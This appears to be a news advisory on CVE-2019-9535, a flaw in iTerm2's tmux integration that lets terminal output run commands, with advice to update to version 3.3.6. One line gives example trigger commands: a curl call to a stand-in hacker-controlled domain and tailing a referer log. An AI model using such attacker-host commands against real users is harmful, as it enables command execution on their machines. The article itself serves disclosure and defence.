Cybersecurity analysts have discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2.
After finding the vulnerability, researchers reported to iTerm2’s developer in order to develop a patch for the issue.
iTerm2 is one of the most popular terminal emulators in the world and frequently used by developers. iTerm2 was selected for a security audit because it processes untrusted data and it is widely used, including by high-risk targets, like developers and system administrators from big companies from all over the world.
During the audit, cybersecurity researchers identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years.
Meaning that a hacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.
Example of a cybersecurity attack:
In this case, the cyber attack vectors for this terminal emulator would be connecting to an hacker-controlled SSH server or commands like curl http://hacker.owned.domain.com and tail -f /var/log/apache2/referer_log; and this is just one of the many commands that can exploit the flaw and ultimately affect your macOS.
Researchers documented many ways in a Proof-of-Concept document of a command being run on a mock victim’s machine after connecting to a malicious SSH server. In this case, only a calculator was opened as a placeholder for other, more nefarious commands.
Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.
Experts cybersecurity recommendation:
All users of iTerm2 should update immediately to the latest version (3.3.6) which has been already published in the wild.
An update to iTerm2 is now available with mitigation for this issue, which has been assigned CVE-2019-9535. While iTerm2 will eventually prompt you to update automatically, we recommend you proactively update by going to the iTerm2 menu and choosing Check for updates… The fix is available in version 3.3.6.
Be aware that a prior update was published earlier this week (3.3.5) and it does not contain the fix, meaning that your mac is still vulnerable, it is recommended to check if you have your last version on.
Besides this make sure that you regularly check for system updates and other app updates, remember that an outdated app cand fast become an open door for hackers